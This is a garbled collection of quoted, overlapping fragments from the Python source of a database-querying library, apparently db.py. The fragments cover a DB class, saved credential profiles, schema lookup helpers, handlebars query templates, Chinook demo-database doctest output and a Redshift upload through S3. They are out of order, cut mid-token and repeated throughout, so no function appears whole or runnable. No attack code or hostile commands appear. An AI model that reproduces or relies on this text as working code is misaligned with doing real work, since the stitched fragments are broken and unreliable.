Excpetion: {1}\".format(name, e)) def DemoDB(keys_per_column=None, **kwargs): \"\"\" Provides", "= [] tables = [row[0] for row in self.cur.execute(\"select name from sqlite_master where", "profile {0}! Excpetion: {1}\".format(name, e)) def DemoDB(keys_per_column=None, **kwargs): \"\"\" Provides an instance of", "NVARCHAR(70) | +----------+----------------+--------------+ db.find_column(\"*Address*\", data_type=\"NVARCHAR(70)\") # returns all columns containing Address that are", "'{{ name }}' as table_name, ... COUNT(*) as cnt ... FROM ... {{", "open(f) except: raise Exception(\"Profile '{0}' does not exist. Could not find file {1}\".format(name,", "Finger On You 0.99 6 Let's Get It Up 0.99 7 Inject The", "u'dbtype': u'postgres', u'filename': None, u'hostname': u'muppets.yhathq.com', u'password': <PASSWORD>, u'port': 5432, u'username': u'kermit'}} \"\"\"", "except Exception as e: print (\"Error executing command:\") print (\"\\t '{0}'\".format(cmd)) print (\"Exception:", "slices per node, so if running 2 nodes you will want chunk_size=4, 8,", "you will want chunk_size=4, 8, etc AWS_ACCESS_KEY: str your aws access key. if", "in self.cur: # second value in relationship tuple is the table name table_db_ref_keys[rel[1]].append(rel)", "defaults to default port for db. 
portgres: 5432 redshift: 5439 mysql: 3306 sqlite:", "random issue where rows are not in the same order, making doctest fail.", "PlaylistTrack | PlaylistId | INTEGER | | Track | TrackId | INTEGER |", "self._query_templates = query_templates.get(self.dbtype).queries if self.dbtype==\"postgres\" or self.dbtype==\"redshift\": if not HAS_PG: raise Exception(\"Couldn't find", "Table | Column Name | Type | +-------------+----------------+--------------+ | Customer | Address |", "str Preconfigured database credentials / profile for how you like your queries exclude_system_tables:", "tables = {} # generate our Columns, and attach to each table to", "__repr__(self): return self.__str__() def __delete__(self): del self.cur del self.con def load_credentials(self, profile=\"default\"): \"\"\"", "q = self._query_templates['system']['schema_no_system'] else: q = self._query_templates['system']['schema_with_system'] self.cur.execute(q) col_meta = self.cur return col_meta,", "name for your shiny new table df: DataFrame data frame you want to", "s3: S3 alternative to using keys, you can use an S3 object print_sql:", "= threading.Thread(target=upload_chunk, args=(i, )) t.start() threads.append(t) # join all threads for t in", "EXISTS {0};\".format(name) if print_sql: sys.stderr.write(sql + \"\\n\") self._try_command(sql) # generate schema from pandas", "our Tables, and load them into a TableSet self._tables = TableSet([Table(self.con, self._query_templates, table_meta[t]['schema'],", "want to query the system tables. limit: int, None Default number of records", "in order to operate). This includes things like schema definitions. 
Most of you", "| Genre | Name | NVARCHAR(120) | | MediaType | Name | NVARCHAR(120)", "DemoDB() >>> len(db.find_column(\"Name\").columns) 5 >>> len(db.find_column(\"*Id\").columns) 20 >>> len(db.find_column(\"*Address*\").columns) 3 >>> len(db.find_column(\"*Address*\", data_type=\"NVARCHAR(70)\").columns)", "and isinstance(self.schemas, list) and 'schema_specified' in \\ self._query_templates['system']: schemas_str = ','.join([repr(schema) for schema", "use_cache=False): \"\"\" Pulls your database's schema again and looks for any new tables", "in [\"username\", \"password\", \"hostname\", \"port\", \"dbname\"]: if getattr(self, arg): value = getattr(self, arg)", "s3_bucket: conn.delete_bucket(bucket_name) sys.stderr.write(\"done!\") def to_dict(self): \"\"\"Dict representation of the database as credentials plus", "col['type'])) else: sys.stderr.write(\"Refreshing schema. Please wait...\") if self.schemas is not None and isinstance(self.schemas,", "used by the DB.query method. You can override it by adding limit={X} to", "raise Exception(\"Couldn't find MySQLdb or pymysql library. Please ensure it is installed\") creds", "admin you might actually want to query the system tables. limit: int, None", "{0} to s3 in chunks\".format(name)) len_df = len(df) chunks = range(0, len_df, chunk_size)", "1 Deaffy & R.A. 
Smith-Diesel 375418 5 1 <NAME>, <NAME>, <NAME> 205662 6", "in chunks: t = threading.Thread(target=upload_chunk, args=(i, )) t.start() threads.append(t) # join all threads", "queries exclude_system_tables: bool Whether or not to include \"system\" tables (the ones that", "hostname = self.hostname elif hasattr(self, 'port'): hostname = '{0}:{1}'.format(self.hostname, self.port) else: hostname =", ">>> results = db.find_table(\"*\") # returns everything \"\"\" tables = [] for table", "temp table tmp_dbpy_foreign_keys(table_name varchar, column_name varchar, foreign_table varchar, foreign_column varchar);\") foreign_keys = []", "\"\"\" Query your database from a file. Parameters ---------- filename: str A SQL", "DB try: __import__('imp').find_module('psycopg2') db = DB(username=\"kermit\", password=\"<PASSWORD>\", hostname=\"themuppets.com\", port=5432, dbname=\"muppets\", dbtype=\"postgres\") db =", "| EmployeeId | INTEGER | | Employee | Address | NVARCHAR(70) | |", "To Rock We Salute You 1 1 2 Balls to the Wall 2", "mssql, or redshift\") self._use_cache = cache if dbtype not in (\"sqlite\", \"mssql\") and", "as either function argument or as an environment variable `AWS_SECRET_KEY`\") conn = S3Connection(AWS_ACCESS_KEY,", "to control the rendering of PrettyTable a bit. None means that you'll have", "= Location.DEFAULT except ImportError: raise Exception(\"Couldn't find boto library. Please ensure it is", "driver if self.dbtype is None: raise Exception(\"Database type not specified! Must select one", "| Name | NVARCHAR(120) | | Track | Name | NVARCHAR(200) | +-----------+-------------+---------------+", "tables[t], keys_per_column=self.keys_per_column) for t in sorted(tables.keys())]) sys.stderr.write(\"done!\\n\") def _get_db_metadata(self, exclude_system_tables, use_cache): col_meta =", "1 None 342562 2 1 <NAME>, <NAME>, U. Dirkscneider & W. Ho... 
230619", "sqlite_master ;\") for (table_name, sql) in self.cur: rgx = \"FOREIGN KEY \\(\\[(.*)\\]\\) REFERENCES", "\"password\", \"hostname\", \"port\", \"dbname\"]: if getattr(self, arg): value = getattr(self, arg) if arg==\"username\":", "self.cur.execute(self._query_templates['system']['ref_keys_for_db']) table_db_ref_keys = defaultdict(list) for rel in self.cur: # second value in relationship", "None: continue for (column_name, foreign_table, foreign_key) in re.findall(rgx, sql): foreign_keys.append((table_name, column_name, foreign_table, foreign_key))", "Rock (We Salute You) 1 1 1 2 Balls to the Wall 2", "to chunk the file into pieces. according to amazon, this is # much", "to `DB()`. None indicates that there will be no limit (That's right, you'll", "with permission on specific buckets can use this feature bucket_name = \"dbpy-{0}\".format(uuid.uuid4()) if", "pymysql mysql_connect = pymysql.connect HAS_MYSQL = True except ImportError: HAS_MYSQL = False try:", "elif not use_cache: self._tables = TableSet([Table(self.con, self._query_templates, tables[t][0].schema, t, tables[t], keys_per_column=self.keys_per_column) for t", "if it already exists chunk_size: int (10000) Number of DataFrame chunks to upload", "= DB(username=\"fozzybear\", password=\"<PASSWORD>\", hostname=\"ec2.523.24.131\", port=5432, dbname=\"muppets_redshift\", dbtype=\"redshift\") except ImportError: pass try: __import__('imp').find_module('pymysql') db", "function definition because we're # lazily importing boto only if necessary here. if", "INTEGER | | PlaylistTrack | PlaylistId | INTEGER | | Track | TrackId", "right, you'll be limitless. Bradley Cooper style.) keys_per_column: int, None Default number of", "chunks to upload and COPY from S3. Upload speed is *much* faster if", "available for redshift.\") try: from boto.s3.connection import S3Connection from boto.s3.key import Key from", "self._try_command(sql) self.con.commit() # perform the \\COPY here. 
the s3 argument is a prefix,", "self.con = sqlite.connect(self.filename) self.cur = self.con.cursor() self._create_sqlite_metatable() elif self.dbtype==\"mysql\": if not HAS_MYSQL: raise", "Salute You 8 For Those About To Rock We Salute You 9 For", "for printing sql statement that will be executed bucket_location: boto.s3.connection.Location a specific AWS", "t in threads: t.join() sys.stderr.write(\"done\\n\") if drop_if_exists: sql = \"DROP TABLE IF EXISTS", "__str__(self): return \"DB[{dbtype}][{hostname}]:{port} > {user}@{dbname}\".format( dbtype=self.dbtype, hostname=self.hostname, port=self.port, user=self.username, dbname=self.dbname) def __repr__(self): return", "or \"localhost\", database=self.dbname or '' ) conn_str = ((self.username and self.password) and \"{}{}\".format(", "into tmp_dbpy_foreign_keys(table_name, column_name, foreign_table, foreign_column) values('{0}', '{1}', '{2}', '{3}');\" self.cur.execute(sql_insert.format(*row)) self.con.commit() sys.stderr.write(\"finished!\\n\") def", "| INTEGER | | Employee | Address | NVARCHAR(70) | | Genre |", "TABLE IF NOT EXISTS\") if print_sql: sys.stderr.write(sql + \"\\n\") self._try_command(sql) self.con.commit() # perform", "the temporary transfer s3 bucket. This should match your redshift cluster's region. 
Examples", "= template(data) query = str(query) else: return q return query def query(self, q,", "u'password': None, u'port': 5432, u'username': None}, 'muppets': {u'dbname': u'muppetdb', u'dbtype': u'postgres', u'filename': None,", "Name | NVARCHAR(200) | +-----------+-------------+---------------+ db.find_column(\"*Id\") # returns all columns ending w/ Id", "sql) in self.cur: rgx = \"FOREIGN KEY \\(\\[(.*)\\]\\) REFERENCES \\[(.*)\\] \\(\\[(.*)\\]\\)\" if sql", "is the table name table_db_foreign_keys[rel[1]].append(rel) self.cur.execute(self._query_templates['system']['ref_keys_for_db']) table_db_ref_keys = defaultdict(list) for rel in self.cur:", "k in ('schema', 'name', 'foreign_keys', 'ref_keys')} # col metadata: format as list of", "up to the Chinook DB See http://chinookdatabase.codeplex.com/ for more info. \"\"\" _ROOT =", "port = 5432 elif dbtype==\"redshift\": port = 5439 elif dbtype==\"mysql\": port = 3306", "0.99 1 0.99 db.query(\"select * from Track\", limit=10) TrackId Name AlbumId MediaTypeId \\", "in self._metadata_cache: # table metadata table_meta[table['name']] = {k: table[k] for k in ('schema',", "do this in the function definition because we're # lazily importing boto only", "sys.stderr.write(\"finished!\\n\") def refresh_schema(self, exclude_system_tables=True, use_cache=False): \"\"\" Pulls your database's schema again and looks", "your environment variables s3: S3 alternative to using keys, you can use an", "Exception(\"Must specify AWS_ACCESS_KEY as either function argument or as an environment variable `AWS_ACCESS_KEY`\")", "tables: tables[table_name] = [] tables[table_name].append(Column(self.con, self._query_templates, table_schema, table_name, column_name, data_type, self.keys_per_column)) return tables", "bucket.list(): key.delete() if not s3_bucket: conn.delete_bucket(bucket_name) sys.stderr.write(\"done!\") def to_dict(self): \"\"\"Dict representation of the", "os.path.expanduser(\"~\") if s3: f = os.path.join(user, S3_PROFILE_ID + 
name) else: f = os.path.join(user,", "2 3 Restless and Wild 2 3 4 Let There Be Rock 1", "item in data] query = [str(item) for item in query] if union==True: query", "{\"cols\": [\"AlbumId\", \"Title\", \"ArtistId\"]} >>> len(db.query(q, data=data, union=False)) 347 db.query(q, data=data, union=False) AlbumId", "is not None: pass else: raise Exception(\"Database type not specified! Must select one", "pymssql HAS_PYMSSQL = True except ImportError: HAS_PYMSSQL = False DBPY_PROFILE_ID = \".db.py_\" S3_PROFILE_ID", "your database (i.e. \"dw\", \"prod\") \"\"\" f = profile_path(DBPY_PROFILE_ID, profile) if f: creds", "3 2 5 6 Put The Finger On You 1 1 6 7", "for f in os.listdir(user): if f.startswith(\".db.py_\"): profile = load_from_json(os.path.join(user, f)) tables = profile.pop('tables',", "try: open(f) except: raise Exception(\"Profile '{0}' does not exist. Could not find file", "self.con.rollback() def to_redshift(self, name, df, drop_if_exists=False, chunk_size=10000, AWS_ACCESS_KEY=None, AWS_SECRET_KEY=None, s3=None, print_sql=False, bucket_location=None, s3_bucket=None):", "union: bool Whether or not \"UNION ALL\" handlebars templates. This will return any", "the foreign and reference keys. This is used to control the rendering of", "db.find_table(\"A*\") +--------+--------------------------+ | Table | Columns | +--------+--------------------------+ | Album | AlbumId, Title,", "loading is performed for col in table['columns']: col_meta.append((col['schema'], col['table'], col['name'], col['type'])) else: sys.stderr.write(\"Refreshing", "Name | NVARCHAR(120) | | MediaType | Name | NVARCHAR(120) | | Playlist", "Whether or not to include \"system\" tables (the ones that the database needs", "342562 5510424 <BLANKLINE> UnitPrice 0 0.99 1 0.99 db.query(\"select * from Track\", limit=10)", "\"Artist\"}, ... {\"name\": \"Track\"} ... 
] >>> db.query(q, data=data) table_name cnt 0 Album", "self.schemas]) q = self._query_templates['system']['schema_specified'] % schemas_str elif exclude_system_tables: q = self._query_templates['system']['schema_no_system'] else: q", "self.cur = self.con.cursor() elif HAS_PYMSSQL: if '\\\\' in self.hostname: hostname = self.hostname elif", "TABLE\", \"CREATE TABLE IF NOT EXISTS\") if print_sql: sys.stderr.write(sql + \"\\n\") self._try_command(sql) self.con.commit()", "1 1 2 Balls to the Wall 2 2 2 3 Fast As", "f = os.path.join(user, DBPY_PROFILE_ID + name) try: try: open(f) except: raise Exception(\"Profile '{0}'", "self.cur.execute(\"SELECT name, sql FROM sqlite_master where sql like '%REFERENCES%';\") # find for foreign", "ImportError: HAS_PG = False try: import MySQLdb mysql_connect = MySQLdb.connect HAS_MYSQL = True", "= [] tables[table_name].append(Column(self.con, self._query_templates, table_schema, table_name, column_name, data_type, self.keys_per_column)) return tables def _try_command(self,", "in ('schema', 'name', 'foreign_keys', 'ref_keys')} # col metadata: format as list of tuples,", "returns all columns ending w/ Id +---------------+---------------+---------+ | Table | Column Name |", "| Invoice | BillingAddress | NVARCHAR(70) | | InvoiceLine | InvoiceLineId | INTEGER", "through your database's schema for a column. Parameters ----------- search: str glob pattern", "little sister from stealing your passwords. 
Parameters ---------- profile: str (optional) identifier/name for", "CSV IGNOREHEADER as 1 GZIP; \"\"\".format(name=name, bucket_name=bucket_name, AWS_ACCESS_KEY=AWS_ACCESS_KEY, AWS_SECRET_KEY=AWS_SECRET_KEY) if print_sql: sys.stderr.write(sql +", "user = os.path.expanduser(\"~\") for f in os.listdir(user): if f.startswith(\".db.py_\"): profile = load_from_json(os.path.join(user, f))", "as f: f.write(chunk.to_csv(index=False, encoding='utf-8')) k.set_contents_from_string(out.getvalue()) sys.stderr.write(\".\") return i threads = [] for i", "e: raise Exception(\"Could not remove profile {0}! Excpetion: {1}\".format(name, e)) def DemoDB(keys_per_column=None, **kwargs):", "table_name, column_name, data_type, self.keys_per_column)) return tables def _try_command(self, cmd): try: self.cur.execute(cmd) except Exception", "sqlite3 as sqlite HAS_SQLITE = True except ImportError: HAS_SQLITE = False try: import", "as f: ... f.write(q) 109 >>> len(db.query_from_file(\"db/tests/myscript.sql\", limit=10)) 10 db.query_from_file(\"db/tests/myscript.sql\", limit=10) Title \\", "if s3_bucket: bucket = conn.get_bucket(s3_bucket) bucket_name = s3_bucket else: bucket = conn.create_bucket(bucket_name, location=bucket_location)", "use_cache: # generate our Tables, and load them into a TableSet self._tables =", "9 Evil Walks 0.99 \"\"\" with open(filename) as fp: q = fp.read() return", "db.query(q, data=data, union=False) AlbumId Title ArtistId 0 1 For Those About To Rock", "ArtistId | | Artist | ArtistId, Name | +--------+--------------------------+ >>> results = db.find_table(\"tmp*\")", "try: import pymysql mysql_connect = pymysql.connect HAS_MYSQL = True except ImportError: HAS_MYSQL =", "and isinstance(getattr(table, col), Column) and getattr(table, col).type not in data_type: continue if isinstance(getattr(table,", "it doens't exist sql = sql.replace(\"CREATE TABLE\", \"CREATE TABLE IF NOT EXISTS\") if", "= {} for arg in [\"username\", \"password\", \"hostname\", \"port\", 
\"dbname\"]: if getattr(self, arg):", "Column) and getattr(table, col).type not in data_type: continue if isinstance(getattr(table, col), Column): cols.append(getattr(table,", "Restless and Wild 2 3 4 Let There Be Rock 1 4 5", "You) 1 1 1 2 Balls to the Wall 2 2 <BLANKLINE> GenreId", "| | Employee | Address | NVARCHAR(70) | | Genre | GenreId |", "only available for redshift.\") try: from boto.s3.connection import S3Connection from boto.s3.key import Key", "q: str Query string to execute data: list, dict Optional argument for handlebars-queries.", "8, etc AWS_ACCESS_KEY: str your aws access key. if this is None, the", "= conn.create_bucket(bucket_name, location=bucket_location) # we're going to chunk the file into pieces. according", "library. Please ensure it is installed\") if s3 is not None: AWS_ACCESS_KEY =", "Track | GenreId | INTEGER | | Track | Bytes | INTEGER |", "type(s) you want to return Examples ---------- >>> from db import DemoDB >>>", "vars(table): if glob.fnmatch.fnmatch(col, search): if data_type and isinstance(getattr(table, col), Column) and getattr(table, col).type", "203102 9 1 <NAME>, <NAME>, <NAME> 263497 Bytes UnitPrice 0 11170334 0.99 1", "0.99 9 Evil Walks 0.99 >>> template = ''' ... SELECT ... '{{", "tmp_dbpy_schema(table_name varchar, column_name varchar, data_type varchar);\") for row in rows_to_insert: self.cur.execute(\"insert into tmp_dbpy_schema(table_name,", "u'kermit'}} \"\"\" profiles = {} user = os.path.expanduser(\"~\") for f in os.listdir(user): if", "tables. limit: int, None Default number of records to return in a query.", "To Rock (We Salute You) 1 1 1 2 Balls to the Wall", "try: from StringIO import StringIO # Python 2.7 except: from io import StringIO", "all. 
profile: str Preconfigured database credentials / profile for how you like your", "| PlaylistTrack | TrackId | INTEGER | | PlaylistTrack | PlaylistId | INTEGER", "\"port\": self.port, \"filename\": db_filename, \"dbname\": self.dbname, \"dbtype\": self.dbtype, \"schemas\": self.schemas, \"limit\": self.limit, \"keys_per_column\":", "query = [str(item) for item in query] if union==True: query = \"\\nUNION ALL\".join(query)", "Name UnitPrice 0 For Those About To Rock (We Salute You) 0.99 1", "order, making doctest fail. db.find_column(\"Name\") # returns all columns named \"Name\" +-----------+-------------+---------------+ |", "... {{ . }} ... {{else}} ... {{ . }} , ... {{/if}}", "elif profile is not None: pass else: raise Exception(\"Database type not specified! Must", "conn.create_bucket(bucket_name, location=bucket_location) # we're going to chunk the file into pieces. according to", "sys.stderr.write(sql + \"\\n\") self._try_command(sql) # generate schema from pandas and then adapt for", "need to convert it to Postgres sql = sql.replace(\"[\", \"\").replace(\"]\", \"\") # we'll", "347 1 Artist 275 2 Track 3503 >>> q = ''' ... SELECT", "self.dbtype!=\"redshift\": raise Exception(\"Sorry, feature only available for redshift.\") try: from boto.s3.connection import S3Connection", "REFERENCES \\[(.*)\\] \\(\\[(.*)\\]\\)\" if sql is None: continue for (column_name, foreign_table, foreign_key) in", "About To Rock We Salute You 1 1 2 Balls to the Wall", "be passed to the template and rendered using handlebars. 
union: bool Whether or", "if sql is None: continue for (column_name, foreign_table, foreign_key) in re.findall(rgx, sql): foreign_keys.append((table_name,", "Those About To Rock We Salute You 1 Balls to the Wall 2", "limit=10) TrackId Name AlbumId MediaTypeId \\ 0 1 For Those About To Rock", "self.cur.execute(q) col_meta = self.cur return col_meta, table_meta def _gen_tables_from_col_tuples(self, cols): tables = {}", "Please ensure it is installed\") self.con = sqlite.connect(self.filename) self.cur = self.con.cursor() self._create_sqlite_metatable() elif", "sys.stderr.write(\".\") return i threads = [] for i in chunks: t = threading.Thread(target=upload_chunk,", "a single data frame. limit: int Number of records to return Examples --------", "number of keys to display in the foreign and reference keys. This is", "rel in self.cur: # second value in relationship tuple is the table name", "Snowballed 0.99 9 Evil Walks 0.99 \"\"\" with open(filename) as fp: q =", "Customer | Address | NVARCHAR(70) | | Employee | Address | NVARCHAR(70) |", "self._exclude_system_tables = exclude_system_tables self.handlebars = pybars.Compiler() @property def tables(self): \"\"\"A lazy loaded reference", "query_from_file(self, filename, data=None, union=True, limit=None): \"\"\" Query your database from a file. Parameters", "you want to save to the db drop_if_exists: bool (False) whether you'd like", "bucket_name = s3_bucket else: bucket = conn.create_bucket(bucket_name, location=bucket_location) # we're going to chunk", "database credentials so you don't have to save them in script. Parameters ----------", "DemoDB >>> db = DemoDB() db.query(\"select * from Track\").head(2) TrackId Name AlbumId MediaTypeId", "q = \"select top {limit} * from ({q}) q\".format(limit=limit, q=q) return q def", "or pymssql libraries. 
Please ensure one of them is installed\") if HAS_ODBC: base_con", "\"\"\" Save your database credentials so you don't have to save them in", "+-----------+-------------+---------------+ | Table | Column Name | Type | +-----------+-------------+---------------+ | Artist |", "To Rock We Salute You 1 Balls to the Wall 2 Restless and", "upload and COPY from S3. Upload speed is *much* faster if chunks =", "list): query = [template(item) for item in data] query = [str(item) for item", "and 'schema_specified' in \\ self._query_templates['system']: schemas_str = ','.join([repr(schema) for schema in self.schemas]) q", "252051 4 1 Deaffy & R.A. Smith-Diesel 375418 5 1 <NAME>, <NAME>, <NAME>", "You 0.99 6 Let's Get It Up 0.99 7 Inject The Venom 0.99", "in tables: tables[table_name] = [] tables[table_name].append(Column(self.con, self._query_templates, table_schema, table_name, column_name, data_type, self.keys_per_column)) return", "= creds.get('username') self.password = creds.get('password') self.hostname = creds.get('hostname') self.port = creds.get('port') self.filename =", "profile: str (optional) identifier/name for your database (i.e. \"dw\", \"prod\") \"\"\" f =", "will be executed bucket_location: boto.s3.connection.Location a specific AWS location in which to create", "boto only if necessary here. if bucket_location is None: bucket_location = Location.DEFAULT except", "MySQLdb.connect HAS_MYSQL = True except ImportError: try: import pymysql mysql_connect = pymysql.connect HAS_MYSQL", "your redshift cluster's region. Examples -------- \"\"\" if self.dbtype!=\"redshift\": raise Exception(\"Sorry, feature only", "Album a ... INNER JOIN ... Track t ... 
on a.AlbumId = t.AlbumId;", "of the database as credentials plus tables dict representation.\"\"\" db_dict = self.credentials db_dict.update(self.tables.to_dict())", "mode=\"w\") as f: f.write(chunk.to_csv(index=False, encoding='utf-8')) k.set_contents_from_string(out.getvalue()) sys.stderr.write(\".\") return i threads = [] for", "limit: q = q.rstrip().rstrip(\";\") q = \"select * from ({q}) q limit {limit}\".format(q=q,", "from db import DemoDB >>> db = DemoDB() >>> q = ''' ...", "driver=self.driver or \"SQL Server\", server=self.hostname or \"localhost\", port=self.port, database=self.dbname or '', uid=self.username, pwd=<PASSWORD>)", "INTEGER | | Invoice | BillingAddress | NVARCHAR(70) | | InvoiceLine | InvoiceLineId", "union==True: query = \"\\nUNION ALL\".join(query) else: query = \"\\n\".join(query) elif isinstance(data, dict): query", "{}).get('foreign_keys_for_db', None), str): self.cur.execute(self._query_templates['system']['foreign_keys_for_db']) table_db_foreign_keys = defaultdict(list) for rel in self.cur: # second", "= os.path.join(user, S3_PROFILE_ID + name) else: f = os.path.join(user, DBPY_PROFILE_ID + name) try:", "drop_if_exists: bool (False) whether you'd like to drop the table if it already", "Examples -------- db = DB(dbname=\"AdventureWorks2012\", dbtype=\"mssql\", driver=\"{FreeTDS}\") from db import DB try: __import__('imp').find_module('psycopg2')", "def save_metadata(self, profile=\"default\"): \"\"\"Save the database credentials, plus the database properties to your", "a TableSet self._tables = TableSet([Table(self.con, self._query_templates, table_meta[t]['schema'], t, tables[t], keys_per_column=self.keys_per_column, foreign_keys=table_meta[t]['foreign_keys']['columns'], ref_keys=table_meta[t]['ref_keys']['columns']) for", "'{0}' does not exist. 
Could not find file {1}\".format(name, f)) os.remove(f) except Exception", "redshift\") self._use_cache = cache if dbtype not in (\"sqlite\", \"mssql\") and username is", "not HAS_ODBC and not HAS_PYMSSQL: raise Exception(\"Couldn't find pyodbc or pymssql libraries. Please", "if data_type and isinstance(getattr(table, col), Column) and getattr(table, col).type not in data_type: continue", "def query(self, q, data=None, union=True, limit=None): \"\"\" Query your database with a raw", "what you're looking for Examples ---------- >>> from db import DemoDB >>> db", "= self._query_templates['system']['schema_with_system'] self.cur.execute(q) col_meta = self.cur return col_meta, table_meta def _gen_tables_from_col_tuples(self, cols): tables", "| CustomerId | INTEGER | | Employee | ReportsTo | INTEGER | |", "_get_db_metadata(self, exclude_system_tables, use_cache): col_meta = [] table_meta = {} # pull out column", "modes for refreshing schema # 1. load directly from cache # 2. use", "(i.e. \"dw\", \"prod\") from db import DB import pymysql db = DB(username=\"hank\", password=\"<PASSWORD>\",", "0.99 7 Inject The Venom 0.99 8 Snowballed 0.99 9 Evil Walks 0.99", "3. 
use the naive approach if use_cache: # generate our Tables, and load", "is None: AWS_SECRET_KEY = os.environ.get('AWS_SECRET_KEY') if AWS_ACCESS_KEY is None: raise Exception(\"Must specify AWS_ACCESS_KEY", "Name | Type | +-------------+----------------+--------------+ | Customer | Address | NVARCHAR(70) | |", "q = self._assign_limit(q, limit) return pd.read_sql(q, self.con) def query_from_file(self, filename, data=None, union=True, limit=None):", "| Table | Column Name | Type | +-------------+----------------+--------------+ | Customer | Address", "To Rock We Salute You Name UnitPrice 0 For Those About To Rock", "pandas as pd import pybars from .column import Column, ColumnSet from .table import", "mssql, or redshift\") self._query_templates = query_templates.get(self.dbtype).queries if self.dbtype==\"postgres\" or self.dbtype==\"redshift\": if not HAS_PG:", "| | Genre | Name | NVARCHAR(120) | | MediaType | Name |", "__delete__(self): del self.cur del self.con def load_credentials(self, profile=\"default\"): \"\"\" Loads crentials for a", "# find for foreign keys self.cur.execute(\"drop table if exists tmp_dbpy_foreign_keys;\") self.cur.execute(\"create temp table", "our Tables, and load them into a TableSet self._tables = TableSet([Table(self.con, self._query_templates, tables[t][0].schema,", "Exception(\"Couldn't find MySQLdb or pymysql library. Please ensure it is installed\") creds =", "\"\"\"Dict representation of the database as credentials plus tables dict representation.\"\"\" db_dict =", "Columns | +--------+--------------------------+ | Album | AlbumId, Title, ArtistId | | Artist |", "Salute You) 0.99 1 Balls to the Wall 0.99 2 Fast As a", "Please ensure one of them is installed\") if HAS_ODBC: base_con = \"Driver={driver};Server={server};Database={database};\".format( driver=self.driver", "q = ''' ... SELECT ... {{#cols}} ... {{#if @last}} ... 
{{ .", "col metadata: format as list of tuples, to match how normal loading is", "table['columns']: col_meta.append((col['schema'], col['table'], col['name'], col['type'])) else: sys.stderr.write(\"Refreshing schema. Please wait...\") if self.schemas is", "isinstance(self.schemas, list) and 'schema_specified' in \\ self._query_templates['system']: schemas_str = ','.join([repr(schema) for schema in", "self._tables = TableSet([]) self._exclude_system_tables = exclude_system_tables self.handlebars = pybars.Compiler() @property def tables(self): \"\"\"A", "\"INTEGER\"]) # returns all columns have an \"e\" and are NVARCHAR(70)S or INTEGERS", "list_profiles(): \"\"\" Lists all of the database profiles available Examples -------- No doctest,", "data_type=None): \"\"\" Aggresively search through your database's schema for a column. Parameters -----------", "Parameters ---------- profile: str (optional) identifier/name for your database (i.e. \"dw\", \"prod\") from", "| InvoiceLineId | INTEGER | | InvoiceLine | InvoiceId | INTEGER | |", "there will be no limit (That's right, you'll be limitless. Bradley Cooper style.)", "str(query) else: return q return query def query(self, q, data=None, union=True, limit=None): \"\"\"", "... 
f.write(q) 109 >>> len(db.query_from_file(\"db/tests/myscript.sql\", limit=10)) 10 db.query_from_file(\"db/tests/myscript.sql\", limit=10) Title \\ 0 For", "all of the data*.gz files we've created sys.stderr.write(\"Copying data from s3 to redshfit...\")", "as pyo HAS_ODBC = True except ImportError: HAS_ODBC = False try: import pymssql", "| Playlist | PlaylistId | INTEGER | | PlaylistTrack | TrackId | INTEGER", "relationship tuple is the table name table_db_foreign_keys[rel[1]].append(rel) self.cur.execute(self._query_templates['system']['ref_keys_for_db']) table_db_ref_keys = defaultdict(list) for rel", "all columns ending w/ Id +---------------+---------------+---------+ | Table | Column Name | Type", "sqlite.connect(self.filename) self.cur = self.con.cursor() self._create_sqlite_metatable() elif self.dbtype==\"mysql\": if not HAS_MYSQL: raise Exception(\"Couldn't find", "for getting all key relationships # 3. use the naive approach if use_cache:", "self.dbtype in [\"postgres\", \"redshift\", \"sqlite\", \"mysql\"]: if limit: q = q.rstrip().rstrip(\";\") q =", "doctest fail. db.find_column(\"Name\") # returns all columns named \"Name\" +-----------+-------------+---------------+ | Table |", "Profiles are stored in ~/.db.py_{profile_name} and are a base64 encoded JSON file. This", "None elif dbtype==\"mssql\": port = 1433 elif profile is not None: pass else:", "from sqlite_master where type='table';\")] for table in tables: for row in self.cur.execute(\"pragma table_info('{0}')\".format(table)):", "\"\"\" if self.dbtype!=\"redshift\": raise Exception(\"Sorry, feature only available for redshift.\") try: from boto.s3.connection", "return i threads = [] for i in chunks: t = threading.Thread(target=upload_chunk, args=(i,", "are a base64 encoded JSON file. This is not to say this a", "mysql_connect = pymysql.connect HAS_MYSQL = True except ImportError: HAS_MYSQL = False try: import", "database's schema again and looks for any new tables and columns. 
\"\"\" col_meta,", "(We Salute You) 0.99 1 Balls to the Wall 0.99 2 Fast As", "DB(object): \"\"\" Utility for exploring and querying a database. Parameters ---------- username: str", "to import the relevant database libraries # TODO: maybe add warnings? try: import", "| Column Name | Type | +-------------+----------------+--------------+ | Customer | Address | NVARCHAR(70)", "for redshift sql = pd.io.sql.get_schema(df, name) # defaults to using SQLite format. need", "1 1 GenreId Composer Milliseconds \\ 0 1 <NAME>, <NAME>, <NAME> 343719 1", "pass \"\"\" def __init__(self, username=None, password=<PASSWORD>, hostname=\"localhost\", port=None, filename=None, dbname=None, dbtype=None, schemas=None, profile=\"default\",", "= DB(username=\"root\", hostname=\"localhost\", dbname=\"employees\", dbtype=\"mysql\") db = DB(filename=\"/path/to/mydb.sqlite\", dbtype=\"sqlite\") except ImportError: pass \"\"\"", "ImportError: try: import pypyodbc as pyo HAS_ODBC = True except ImportError: HAS_ODBC =", "= self.load_metadata(profile) else: self.username = username self.password = password self.hostname = hostname self.port", "chunks = multiple-of-slices. Ex: DW1.XL nodes have 2 slices per node, so if", "Dawn 3 2 5 6 Put The Finger On You 1 1 6", "else: profile['metadata'] = False profiles[f[7:]] = profile return profiles def remove_profile(name, s3=False): \"\"\"", "= \"dbpy-{0}\".format(uuid.uuid4()) if s3_bucket: bucket = conn.get_bucket(s3_bucket) bucket_name = s3_bucket else: bucket =", "Column Name | Type | +---------------+---------------+---------+ | Album | AlbumId | INTEGER |", "+-------------+----------------+--------------+ \"\"\" if isinstance(data_type, str): data_type = [data_type] cols = [] for table", "<NAME> 263497 Bytes UnitPrice 0 11170334 0.99 1 5510424 0.99 2 3990994 0.99", ">>> q = ''' ... SELECT ... a.Title, ... t.Name, ... t.UnitPrice ...", "for your shiny new table df: DataFrame data frame you want to save", "and COPY from S3. 
